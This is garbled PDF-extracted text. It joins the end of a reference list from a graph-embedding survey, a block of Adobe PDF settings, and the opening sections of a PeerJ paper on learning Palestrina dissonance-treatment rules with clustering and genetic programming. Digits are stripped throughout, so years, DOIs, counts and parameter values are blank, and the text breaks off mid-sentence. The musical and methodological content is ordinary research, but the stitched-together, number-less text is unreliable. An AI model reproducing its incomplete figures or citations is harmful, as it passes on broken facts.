y. . expert finding for community-based question answering via ranking metric network learning. in: ijcai. – . zheng d, ma c, wang m, zhou j, su q, song x, gan q, zhang z, karypis g. a. distdgl: distributed graph neural network training for billion-scale graphs. arxiv preprint arxiv: . . zheng vw, cavallari s, cai h, chang kc-c, cambria e. . from node embedding to community embedding. arxiv preprint arxiv: . . zheng w, wang d, song f. . opengraphgym: a parallel reinforcement learning framework for graph optimization problems. in: krzhizhanovskaya vv, závodszky g, lees mh, dongarra jj, sloot pma, brissos s, teixeira j, eds. computational science—iccs . cham: springer international publishing, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . / / https://arxiv.org/abs/ . https://arxiv.org/abs/https://ieeexplore.ieee.org/abstract/document/ https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/https://openreview.net/forum?id=b fa oactq http://dx.doi.org/ . / . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zheng x, ding h, mamitsuka h, zhu s. . collaborative matrix factorization with multiple similarities for predicting drug-target interactions. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . zhong j, li n, kong w, liu s, li th, li g. . graph convolutional label noise cleaner: train a plug-and-play action classifier for anomaly detection. arxiv preprint arxiv: . . zhong j, qiu h, shi b. . dynamics-preserving graph embedding for community mining and network immunization. information-an international interdisciplinary journal ( ): . zhou c, liu y, liu x, liu z, gao j. . scalable graph embedding for asymmetric proximity. in: aaai. – . zhou k, michalak tp, rahwan t, waniek m, vorobeychik y. . adversarial link prediction in social networks. arxiv preprint arxiv: . . zhou s, dai x, chen h, zhang w, ren k, tang r, he x, yu y. . interactive recommender system via knowledge graph-enhanced reinforcement learning. in: proceedings of the rd international acm sigir conference on research and development in information retrieval, sigir ’ . new york: association for computing machinery, – . zhou y, cheng h, yu jx. . graph clustering based on structural/attribute similarities. proceedings of the vldb endowment ( ): – doi . / . . zhu h, lin y, liu z, fu j, chua t-s, sun m. . graph neural networks with generated parameters for relation extraction. in: proceedings of the th annual meeting of the association for computational linguistics. florence: association for computational linguistics, – . zhu s, li j, peng h, wang s, yu ps, he l. a. adversarial directed graph embedding. arxiv preprint arxiv: . . zhu s, yu k, chi y, gong y. . combining content and link for classification using matrix factorization. in: proceedings of the th annual international acm sigir conference on research and development in information retrieval. new york: acm, – . zhu s, zhou l, pan s, zhou c, yan g, wang b. b. gssnn: graph smoothing splines neural networks. in: aaai. – . zhu y, xu y, yu f, liu q, wu s, wang l. c. deep graph contrastive representation learning. arxiv preprint arxiv: . . zitnik m, agrawal m, leskovec j. . modeling polypharmacy side effects with graph convolutional networks. bioinformatics ( ):i –i doi . /bioinformatics/bty . zitnik m, leskovec j. . predicting multicellular function through multi-layer tissue networks. bioinformatics ( ):i –i doi . /bioinformatics/btx . zitnik m, zupan b. . collective pairwise classification for multi-way analysis of disease and drug data. in: biocomputing : proceedings of the pacific symposium. world scientific, – . zong n, kim h, ngo v, harismendy o. . deep mining heterogeneous networks of biomedical linked data to predict novel drug-target associations. bioinformatics ( ): – doi . /bioinformatics/btx . zügner d, akbarnejad a, günnemann s. . adversarial attacks on classification models for graphs. arxiv preprint arxiv: . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . / . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /bioinformatics/bty http://dx.doi.org/ . /bioinformatics/btx http://dx.doi.org/ . /bioinformatics/btx https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ survey on graph embeddings and their applications to machine learning problems on graphs introduction preliminaries methods for constructing graph embedding specific embeddings based on network types application of graph embeddings to machine learning problems applications to real-world problems open problems model comparison results conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice machine learning of symbolic compositional rules with genetic programming: dissonance treatment in palestrina machine learning of symbolic compositional rules with genetic programming: dissonance treatment in palestrina torsten anders and benjamin inden school of media arts and performance, university of bedfordshire, luton, bedfordshire, uk department of computer science and technology, nottingham trent university, nottingham, uk abstract we describe a method for automatically extracting symbolic compositional rules from music corpora. resulting rules are expressed by a combination of logic and numeric relations, and they can therefore be studied by humans. these rules can also be used for algorithmic composition, where they can be combined with each other and with manually programmed rules. we chose genetic programming (gp) as our machine learning technique, because it is capable of learning formulas consisting of both logic and numeric relations. gp was never used for this purpose to our knowledge. we therefore investigate a well understood case in this study: dissonance treatment in palestrina’s music. we label dissonances with a custom algorithm, automatically cluster melodic fragments with labelled dissonances into different dissonance categories (passing tone, suspension etc.) with the dbscan algorithm, and then learn rules describing the dissonance treatment of each category with gp. learning is based on the requirement that rules must be broad enough to cover positive examples, but narrow enough to exclude negative examples. dissonances from a given category are used as positive examples, while dissonances from other categories, melodic fragments without dissonances, purely random melodic fragments, and slight random transformations of positive examples, are used as negative examples. subjects artificial intelligence, data mining and machine learning, multimedia keywords counterpoint, rule learning, palestrina, genetic programming, clustering, algorithmic composition, dissonance detection, computer music introduction artificial intelligence methods have been used for decades to model music composition (fernández & vico, ). two general approaches have attracted particular attention, as they mimic two aspects of how humans learn to compose. firstly, rules have been used for centuries for teaching composition. some algorithmic composition methods model symbolic knowledge and rules, for example, constraint-based approaches and formal grammars. secondly, composers learn from examples of existing music. machine learning (ml) methods of algorithmic composition include markov chains, and artificial neural networks. how to cite this article anders t, inden b. . machine learning of symbolic compositional rules with genetic programming: dissonance treatment in palestrina. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted november published december corresponding author benjamin inden, benjamin.inden@ntu.ac.uk academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. © anders and inden distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:benjamin.�inden@�ntu.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ we aim at combining these two approaches by automatically learning compositional rules from music corpora. we use genetic programming (gp) (poli, langdon & mcphee, ) for that purpose. the resulting rules are represented symbolically, and can thus be studied by humans (in contrast to, say, artificial neural networks), but the rules can also be integrated into algorithmic composition systems. extracting rules automatically is useful, for example, for musicologists to better understand the style of certain corpora, and for composers who use computers as a creative partner (computer-aided composition). for computer scientists, it is a challenging application domain. the resulting rules can be used in existing rule-based approaches to algorithmic composition where multiple rules can be freely combined, for example, in constraint-based systems (anders & miranda, ). rules derived by ml and rules programmed manually can be freely combined in such systems, and rules can address various aspects (e.g. rules on rhythm, melody, harmony, voice leading, and orchestration). potentially, ml can be used to derive rules from a given corpus of music for aspects where we do not have rules yet, for example, how to rhythmically and melodically shape the development of a phrase in a certain style. this article describes a pilot project within the research programme described above. in this pilot, we automatically extract rules for the treatment of dissonances in renaissance music using a corpus of movements from palestrina masses. the treatment of such dissonances is rather well understood, which helps evaluating results. nevertheless, this task is far from trivial, as it has to take various musical viewpoints into account (e.g. melodic interval sizes and directions, note durations, and metric positions). results can be interesting and useful not only for musicologists and composers, but also for the commercially relevant field of music information retrieval to advance the still unsolved problem of automatic harmonic analysis of polyphonic music. background inductive logic programming symbolic compositional rules have been extracted by ml before, specifically with inductive logic programming (ilp). ilp (muggleton et al., ) combines logic programming with ml in order to learn first-order logic formulas from examples. background knowledge expressed in logic programmes can be taken into account. inductive logic programming has been used for several musical applications. closely related to our goal is the work of morales & morales ( ). their system learnt standard counterpoint rules on voice leading, namely how to avoid open parallels. other musical applications of ilp include the learning of harmonic rules that express differences between two music corpora, specifically beatles songs (pop music) and the real book (jazz) (anglade & dixon, ), and music performance rules for piano (tobudic & widmer, ) and violin (ramirez et al., ). numeric relations are difficult to deduce with ilp, as logic programming in general is very restricted in expressing numeric relations. we are specifically interested in also learning numeric relations besides logic relations, because our experience with anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ constraint-based modelling of music composition makes us aware of their importance for compositional rules. for example, the size of melodic and harmonic intervals is important, and such quantities are best expressed numerically. besides, we want to use learnt rules later with constraint programming, a programming paradigm with very good support for restricting numeric relations. genetic programming in this project we therefore use another approach. gp is a particular kind of evolutionary algorithm that is used for ml. in gp, a tree structure is learnt by repeated application of random changes (mutation and recombination) and by the selection of the best structures among a set of candidates (a population) according to some criterion. a candidate tree can be the representation of a computer program or a mathematical equation among other possibilities. early seminal work on gp has been published by koza ( ), a more recent practical introduction can be found in poli, langdon & mcphee ( ). a particularly important application of gp is symbolic regression. symbolic regression infers a mathematical expression that best fits the given data. the mathematical expression is unrestricted except that a specified set of building blocks is used–operators like +, or standard mathematical functions. the trees that gp builds from these building blocks are representations of such mathematical expressions. symbolic regression is a powerful method that has been used in various areas of science and engineering (poli, langdon & mcphee, ), including a high-profile study where it was used to automatically deduce physical laws from experiments (schmidt & lipson, ). genetic programming has been used for music composition before. spector & alpern ( ) propose a system that automatically generates computer programmes for composing four-measure bebop jazz melodies. the generated programmes combine a number of given functions, inspired by jazz literature, that transform short melodies from charlie parker in various ways. the fitness of each programme is evaluated by a set of restrictions inspired by baker ( ), which measure the balance of different aspects (e.g. tonal and rhythmic novelty). johanson & poli ( ) also propose a system that creates computer programmes for transforming short melodies, but they allow users to interactively rate the quality of the generated music. this proved a tedious process for users. therefore they complement the user-rating with automatic fitness raters that learn from the user ratings. previous applications of gp for music composition thus aimed at modelling the full composition process, where the fitness function had to judge the quality of the resulting music. yet, the programmes resulting from the evolutionary algorithm are rather short, and they are thus limited in the compositional knowledge they can represent. previous work therefore composed music by transforming pre-existing music. instead, we are interested in learning compositional rules with gp that describe only a certain aspect of the resulting music. such rules are relevant in their own right as a representation of compositional knowledge that can be complemented with further anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ musical knowledge, for example, in music constraint programming systems with manually encoded musical rules. in this situation, the fitness function does not need to judge musical quality. instead, it only needs to estimate how well the resulting rule fits the given positive examples and avoids the negative examples. as far as we know, gp has not yet been used for learning symbolic compositional rules, and therefore in this study we focus on a relatively well understood class of rules. dissonances in palestrina’s music this project studies the dissonance treatment in palestrina counterpoint with ml by automatically generating multiple symbolic rules that each constrain the treatment of a specific dissonance category (passing tones, suspensions etc.). jeppesen ( ), the seminal authority on palestrina counterpoint, distinguishes three roles a dissonance can play in his music. some dissonances are hardly noticeable on a weak beat used for connecting notes in smooth melodic lines (jeppesen calls them dissonances as a secondary phenomenon); others occur at an accented beat and are clearly heard (dissonances as primary phenomenon); and finally—more rarely—dissonances can be used for an expressive effect. as an example, fig. shows an excerpt from a palestrina mass movement with several dissonance categories in close proximity. all dissonances are marked with a crossed notehead, and are labelled with their dissonance category. passing tones (p.t.) and neighbour tones (n.t.) are short notes on a weak beat that link melodic tones (secondary phenomenon). by contrast, suspensions (s.) stand out; they occur on a strong beat and typically at longer notes. the five standard dissonance categories taught in palestrina counterpoint classes are passing tone, neighbour tone, suspension, anticipation and cambiata (jeppesen, ). traditionally, these categories are introduced progressively in class for pedagogic reasons in so-called species counterpoint, for example, in the textbook by fux ( ), which is still widely used. figure palestrina excerpt with several dissonances: several passing tones (p.t.), a neighbour tone (n.t.), and a suspension (s.), from the agnus of missa de beata marie virginis (ii), measures – . full-size doi: . /peerj-cs. /fig- the excerpt is from the agnus of missa de beata marie virginis (ii), which is agnus_ .krn in the music corpus, and stems from humdrum. see also footnote . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an algorithm for automatically identifying dissonances in renaissance counterpoint has been proposed by patrick & strickler ( ), but it implements knowledge on the standard dissonance categories and therefore we instead developed a custom algorithm. the actual music of palestrina contains further dissonance categories, as shown by computational analysis (sigler, wild & handelman, ). counterpoint composition has often been modelled in a rule-based way, together with the relevant dissonance treatment. already the composition illiac suite, commonly recognised as the first computer-generated composition, implemented for its second experiment and movement four-part first species counterpoint with rules similar to renaissance counterpoint rules (hiller & isaacson, ). as a model for first species counterpoint, this early work sidestepped the issue of dissonance treatment, though, by simply not allowing for any dissonances. ebcioglu ( ) proposed a system that implemented two-part florid counterpoint to a given cantus firmus with rules inspired by renaissance counterpoint that stem from joseph marx and charles koechlin and are complemented by rules of the author. standard dissonance categories like passing tones, neighbour tones and suspensions are implemented, and published results attest to the musical quality of the output. schottstaedt ( ) followed the palestrina counterpoint rules of fux ( ) very faithfully and implemented all of fux’ five species for up to six voices with own rules added to get closer to fux’ actual examples. methods for learning symbolic compositional rules we use a novel methodology that combines multiple established approaches. at first, dissonant notes are automatically labelled in a corpus of music by palestrina with a custom algorithm. these dissonances are then automatically clustered into different dissonance categories (passing notes, suspensions etc.) with the clustering algorithm dbscan (ester et al., ). finally, a rule is learnt for each of these categories with gp. each rule states conditions that must hold between three consecutive melodic notes if the middle note is a dissonance. the rest of this section describes each of these steps in more detail. annotation of dissonances a custom algorithm for dissonance detection in renaissance music as a first step we automatically label dissonances in the music using a custom algorithm implemented with the music analysis environment music (cuthbert & ariza, ). for our purposes, it is better for the algorithm to leave a few complex dissonance categories undetected than to wrongly mark notes as dissonances that are actually not dissonant. note that this algorithm does not implement any knowledge of the dissonance categories known to occur in palestrina’s music. the analysis first ‘chordifies’ the score, that is, it creates a homorhythmic chord progression where a new chord starts whenever one or more notes start in the score, and each chord contains all the score notes sounding at that time. the result of the ‘chordification’ process on its own would loose all voice leading information (e.g. where voice crossing happens), but our algorithm processes those chords and the original anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ polyphonic score in parallel and therefore such information is retained. the algorithm tracks which score notes form which chord by accessing the notes with the same start time (music parameter offset) as a given chord. the algorithm then loops through the chords. if a dissonant chord is found, it tries to find which note(s) make it dissonant by testing whether the chord becomes consonant if the pitches of these note(s) are removed. dissonances are more likely to occur on short notes in palestrina, and sometimes multiple dissonant tones occur simultaneously. the algorithm tests whether individual notes (and pairs of simultaneously moving notes) are dissonant. the algorithm progresses in an order that depends on the notes’ duration and a parameter max pair dur, which specifies the maximum duration of note pairs tested (in our analysis max pair dur equalled to a half note). in order to minimise mislabelling dissonances, the algorithm first tests all individual notes with a duration up to max pair dur in increasing order of their duration; then all note pairs in increasing order of their duration; and finally remaining individual notes in order of increasing duration. suspensions are treated with special care. remember that the algorithm processes the ‘chordified’ score and the actual score in parallel. as a preprocessing step, the algorithm merges tied score notes into single notes to simplify their handling. when the algorithm then loops through the chords and finds a dissonant note that started before the currently tested chord, it splits that note into two tied notes, and only the second note starting with the current chord is marked as dissonant. in order to avoid marking notes wrongly as dissonances, the algorithm does not test the following cases: any note longer than max diss dur, a given maximum dissonance duration (we set it to a whole note); and any suspension where the dissonant part of the note would exceed the preceding consonant part, or it would exceed max diss dur. for this pilot we arbitrarily selected the first agnus mass movements from the full corpus of palestrina music that ships with music . all examples in that subcorpus happen to be in ‘metre’ (tempus imperfectum, denoted with cut half circle), but our method does not depend on that. evaluation of the dissonance detection algorithm we evaluated results by manually ‘eyeballing’ a sample of scores with marked dissonances. the dissonance detection appears to work rather well; only very few notes were found wrongly labelled as a dissonance during our manual examination. figure shows an example where dissonances would not be correctly labelled by our algorithm. the first two passing tones (eighth notes) are correctly labelled in fig. , but our algorithm would instead label the d in the soprano as a dissonance. the problem here is that when the two correct dissonances are removed, the resulting ‘chord’ a–d is a fourth, which is still considered a dissonance in renaissance music. instead, if the soprano d is removed, the remaining chord c–a happens to be consonant. also, sometimes a suspension is not correctly recognised and instead a wrong note is labelled, where the voice proceeds by a skip in shorter notes. a dissonant chord is any chord for which music ’s chord.isconsonant() returns false. that function checks for two pitches whether the interval is a major or minor third, sixth or perfect fifth, and for three pitches whether the chord is a major or minor triad that is not in second inversion. casimiri edition (da palestrina, ), encoded by john miller and converted to humdrum by bret aarden. unfortunately, we have no way to auto- matically estimate the quality of our dissonance detection. nevertheless, the interested reader can confirm in music notation the quality of the dissonance detection by examining the results in the data for this paper (available under digital object identifier (doi) . /zenodo. ) in the folder preprocessing results, which includes musicxml files of all pieces we used, and where detected dissonances are marked by x-shaped note heads. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to be on the safe side for our purposes of learning dissonance treatment, the algorithm therefore does not label all dissonances. for example, occasionally more than two dissonances occur simultaneously in palestrina, for example, when three parts move with the same short rhythmic values or in a counterpoint of more than four voices. if the algorithm does not find tones that, when removed, leave a consonant chord, then no note is labelled as a dissonance (though the chord is marked for proofreading). excluding dissonances with the parameter max diss dur avoided a considerable number of complex cases and otherwise wrongly labelled notes. due to these precautions (avoiding wrongly labelled dissonances), due to the corpus (selected agnus movements) and the frequency of certain dissonance categories in that corpus, only a subset of the standard dissonance categories were detected and learnt as rules in this project (see table ). this point is further discussed below in the section on the evaluation of the clustering. also, because the wrongly labelled dissonances are relatively rare and do not show regular patterns, the cluster analysis sorts these cases into an outlier category, which we did not use for rule learning, further improving the quality of the marked dissonance collections. data given to machine learning instead of handing the ml algorithm only basic score information (e.g. note pitches and rhythmic values), we provide it with background knowledge (like melodic intervals and accent weights as described below), and that way guide the search process. for flexibility, we considered letting the ml algorithm directly access the music score data with a set of given interface functions (methods), but extracting relevant score information in advance is more efficient. once dissonances are annotated in the score, only melodic data is needed for the clustering and later the ml. for simplicity we only used dissonances surrounded by two consonant notes (i.e. no consecutive dissonances like cambiatas). in order to control the differences in ‘key’ between pieces in the corpus, our algorithm computes ‘normalised pitch classes’, where is the tonic of the piece, a semitone above the tonic and so forth. for this purpose we need to compute the ‘key’ of each piece. we are not aware of any algorithm designed for classifying renaissance modes, and we therefore settled on instead using the krumhansl-schmuckler key determination algorithm (krumhansl, ) with simple key correlation weightings by sapp ( ). table the features of the automatically derived clusters match traditional dissonance categories. cluster dissonance category st interval nd interval metric position duration c passing tones down step down step down weak beat up to half note c passing tones up step up step up weak beat up to half note c suspension on beat repetition step down strong beat quarter or half note c suspension on beat repetition step down very strong beat quarter or half note c lower neighbour tone step down step up weak beat up to half note interested readers can investigate the unlabelled dissonances in music nota- tion. in the musicxml files mentioned in the previous footnote, the result of the ‘chordification’ process is included as an additional stave and all dissonances are always labelled in that stave. if the staves of the actual voices do not contain any simultaneous note with x-shaped note head, then that dissonance is not labelled in the score. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while this approach is not able to recognise modes, it is at least able to control the differences in accidentals between pieces. we determine accent weights using music ’s function getaccentweight, where the strongest beat on the first beat of a measure has the weight . ; strong beats within a measure (e.g. the third beat in ‘metre’) the weight . ; the second and fourth beat in metre the weight . and so on (ariza & cuthbert, ). intervals are measured in semitones, and durations in quarter note lengths of music , where means a quarter note, a half note and so on. for simplicity we left ties out in this pilot. suspensions are simply repeated tones, they are not tied over. cluster analysis of dissonance categories analysis with dbscan algorithm for each dissonance, we provide the clustering algorithm with the following features: the sum of the durations of the previous, current, and next note (the reason for including this feature instead of including all note durations is explained in the following ‘discussion’ section); the melodic interval from the previous note (measured in semitones), and the interval to the next note; the ‘normalised’ pitch class of the dissonance (i.e. is the ‘tonic’ etc.); and the accent weight of the dissonance. before clustering, all data for each feature is normalised such that its mean is . and its standard deviation is . . the data is clustered using the dbscan algorithm (ester et al., ) as implemented in the scikit-learn library (pedregosa et al., ). this clustering algorithm does not require setting the number of clusters in advance, and can find clusters of arbitrary shape as it is based on the density of points. here, we set the minimum number of neighbours required to identify a point as a core cluster point to , and the maximum neighbour distance to . based on initial runs and the desire to keep the number of clusters in a reasonable range. points that lie in low density regions of the sample space are recognised as outliers by dbscan, and are ignored in the subsequent rule learning step. clustering results and discussion in order to evaluate the clustering results, we automatically labelled each dissonance in the score with its dissonance category (cluster number), and then created a new score for each cluster number into which all short melodic score snippets that contain this dissonance were collected (one-measure snippets, except where the dissonance occurs at measure boundaries). we then evaluated the clustering results by eyeballing those collections of score snippets . initially, the importance of note durations for the clustering was rated too highly, because the clustering took more duration parameters into account (one for every note) than other parameters (e.g. pitch intervals between notes). as a result, one cluster contained primarily dissonances at half notes and another dissonances at shorter notes, which was not useful for our purposes. therefore, we aggregated the duration information, and adjusted the dbscan parameters as described above, after which clustering worked very well. as future work, it might be worth exploring whether the low-complexity weights that sapp proposed for major and minor—basically assigning to all non-scale degrees and to all scale degrees, but to the tonic and fifth— could be adapted for renaissance modes by assigning to their respective tonics (and the fifths as appropriate). the clustering results, along with all algorithms created, can also be found in the supplemental data, doi: . /zenodo. . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the selected corpus only the following main dissonance categories are found: passing tones downwards on a weak beat ( cases); passing tones upwards on a weak beat ( cases); suspensions on the strong beat in ‘metre’ ( cases); suspensions on the strong beat ( cases); and lower neighbour tones on a weak beat ( cases). table summarises the distinguishing features of the dissonance categories as found in clusters c –c , for which we learnt rules. each row in the table describes a separate dissonance category as recognised by the clustering algorithm. the first interval indicates the melodic interval into the dissonance, and the second the interval from the dissonance to the next note. metric position and duration are features of the dissonant note itself. other dissonance categories like upper neighbour tones, anticipations and cambiatas do not occur in the ml training set. either they do not exist in the first agnus mass movements of the music palestrina corpus that we used, or they were excluded in some way. we only use dissonances surrounded by consonances (which excludes cambiatas). also, we did not use the set of outliers ( cases), which as expected, has no easily discernible common pattern. among these outliers are wrongly labelled dissonances, upper neighbour tones, and a few further cases of the above main categories. there are also two small further clusters with lower neighbour tones (c , cases), and passing tones upwards (c , cases) that were discarded as they were considered to be too small, and cover categories that are already covered by larger clusters. learning of rules training set to initiate rule learning, our algorithm compiles for each identified cluster (dissonance category) a set of three-note-long learning examples with a dissonance as middle note. all dissonances that have been assigned to that particular cluster are used as positive examples. then, four sets of negative examples are generated. note that the generation of negative examples does not take any knowledge about the problem domain into account. a similar approach can also be used for learning rules on other musical aspects. the first set is a random sample of dissonances that have been assigned to other clusters. the second set is a random sample of three-tone-examples without any dissonance taken from the corpus. the third set consists of examples where all features are set to random values drawn from a uniform distribution over the range of possible values for each feature. the fourth set consists of slightly modified random samples from the set of positive examples. two variations are generated for each chosen example. firstly, either the interval between the dissonant tone and the previous note or the interval to the next note is changed by ± semitones (with equal probabilities). secondly, one of the three note durations is either halved or doubled (with equal probabilities). both modifications are stored separately in the fourth set of negative examples. the algorithm aims to create % of the number of positive examples for each set of negative examples, but will generate at least examples ( for the first set due to possible low availability of these examples) and at most . these numbers represent anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mostly a trade-off between accuracy of training/measurement and computation time, and we expect a similar performance if these values are changed within reasonable ranges. once all example sets have been constructed, each example receives a weight such that the total weight of the positive examples is . , and the total weight of each of the four sets of negative examples is . (within each set, the weights are the same for all examples). when measuring classification accuracy of a rule during the learning process, each positive example that is classified correctly counts + times the example weight, whereas each negative example that is erroneously classified as positive example counts − times the example weight. thus, the accuracy score is a number between − . and . , with . expected for a random classifier. please note that with a low probability a randomly generated negative example can be the same as a positive example. here, we consider this as a small amount of noise in the measurement, but for future experiments it is possible to filter these out at the expense of run time. learning process we use strongly typed gp as implemented in the python library deap (https://github. com/deap/deap) (fortin et al., ) with the types float and boolean (integers are translated to floats). the following functions can occur as parent nodes in the tree that represents a learnt rule. logical operators: _ (or), ^ (and), : (not), ! (implication), $ (equivalence) arithmetic operators and relations: þ, �, � (multiplication), = (division), � (unary minus), ¼, <, > conditional: if then elseðhbooleani, hfloati, hfloatiÞ terminal nodes in a ‘rule tree’ can be either input variables (like the duration of a note or the interval to its predecessor or successor) or ephemeral random constants (constants whose values can be 